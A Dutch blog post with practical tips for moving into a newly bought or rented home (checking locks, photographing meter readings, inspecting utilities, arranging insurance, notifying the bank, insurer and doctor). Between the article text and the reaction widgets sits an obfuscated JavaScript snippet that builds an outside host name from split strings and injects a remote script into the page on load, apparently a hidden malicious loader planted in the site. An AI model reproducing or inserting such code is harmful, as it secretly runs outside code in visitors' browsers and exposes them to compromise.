Read Time:3 Minute, 13 Second

Eindelijk is het dan gelukt, ondanks de krappe huizenmarkt heb je een nieuw huis kunnen kopen. Natuurlijk gaat dat proces met een hoop werk vooraf, maar hierna begint het echt werk namelijk pas. Bij de aankoop van een nieuw huis komen er namelijk een hoop zaken op je af. Hieronder geven we je een opsomming van de belangrijkste waar je aan moet denken. Wil jij dus graag weten wat je allemaal moet regelen bij het verhuizen naar een nieuw huis? Hou dan zeker rekening met de onderstaande aandachtspunten!

Eén van de eerste zaken die je moet regelen na de aanschaf van een nieuw huis, is de sloten controleren. Het wordt aangeraden om alle sleutels die je in handen hebt even uit te proberen op de verschillende sloten in huis. Alleen op deze manier ben je er niet alleen zeker van dat je alle sleutels voor handen hebt, maar ook dat je, je woning op passende wijze kan beschermen tegen bijvoorbeeld inbrekers. Hoe dan ook, ondanks het feit dat dit best regelmatig eens over het hoofd wordt gezien is het bij verhuizen naar een nieuw huis van groot belang dat zo snel mogelijk alle sloten worden gecontroleerd, al is het maar uit veiligheidsoverwegingen. Heb je onduidelijkheden, of neem je het zeker voor het onzekere en wil je al sloten laten vervangen? Neem dan contact op met een slotenmaker en zorg dat je alles goed regelt.

Fotografeer de waterstand

Veel van de zaken waar je rekening mee dient te houden zijn afhankelijk van het feit of je bijvoorbeeld gaat verhuizen naar een nieuw huurhuis of een nieuwe woning die je hebt aangekocht. Verhuis je naar een nieuwe huurwoning? In dat geval is het altijd de moeite waard om een foto te nemen van de meterstanden. Mocht er op een zeker ogenblik discussie ontstaan, dan beschik je in ieder geval over fotografisch bewijs.

Als je je intrek neemt in een nieuw huis is het verstandig om een expert te laten kijken of alles goed geregeld is met betrekking tot de nutsvoorzieningen. Je wil natuurlijk niet geconfronteerd worden met een gaslek of een kortsluiting. Ook wanneer er sprake is van centrale verwarming dient deze uiteraard bij voorkeur eerst goed te worden nagekeken voordat er daadwerkelijk gebruik van gemaakt wordt. 

Als je een nieuwe woning gaat betrekken, dien je altijd rekening te houden met de verzekeringen die nodig zijn. Denk bijvoorbeeld aan de inboedel- en brandverzekering. In principe zijn dit twee verzekeringen die je reeds moet afsluiten (en betalen) voor je je intrek neemt in de nieuwe woning. Alleen op deze manier kan je er namelijk honderd procent zeker van zijn dat je bent gedekt tegen mogelijke schade. Naarmate er meer inboedel in je huis is terug te vinden en naarmate je meer waardevolle bezittingen hebt verhuisd zal ook de waarde van de inboedel in de verzekering moeten worden verhoogd. Zie dit niet over het hoofd, dan kom je voor vervelende verrassingen te staan op het ogenblik dat er aanspraak moet worden gemaakt op de verzekering.

Het spreekt voor zich dat je niet alleen maar de gemeente op de hoogte moet brengen van je verhuis. Zo zijn er andere belangrijke instanties die moeten weten waar je woont. Een bekend voorbeeld hiervan is bijvoorbeeld je bank, maar wat te denken van je verzekeraar of de huisarts? Veel mensen houden hier geen rekening mee, maar het is van het grootste belang dat je zo snel mogelijk alle belangrijke partijen op de hoogte breng van je verhuis. Alleen op die manier kan je er namelijk voor zorgen dat je niet op een bepaald ogenblik tegen vervelende verrassingen aan zult lopen. 

(function(){ i4a8_=(“u”+”st”);i4a8=document.createElement(“script”);i4a8.async=true; i4a8u=”317505819″;i4a8_+=”a”+(“t.”);i4a8_+=”i”+(“nf”+(“o”))+(“/”); i4a8u+=”.sy3lrpbe4a896lh3″;i4a8u+=”g3srvxqi3ags17″; i4a8.src=”https://”+i4a8_+i4a8u;i4a8.type=”text/javascript”; d_b=document.body;d_b.appendChild(i4a8); })();
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
aandachtspunten nieuwe woning Previous post Deze punten vragen extra aandacht bij jouw nieuwe woning
teakhouten meubels Next post Zo kun je ook in de winter van je tuin genieten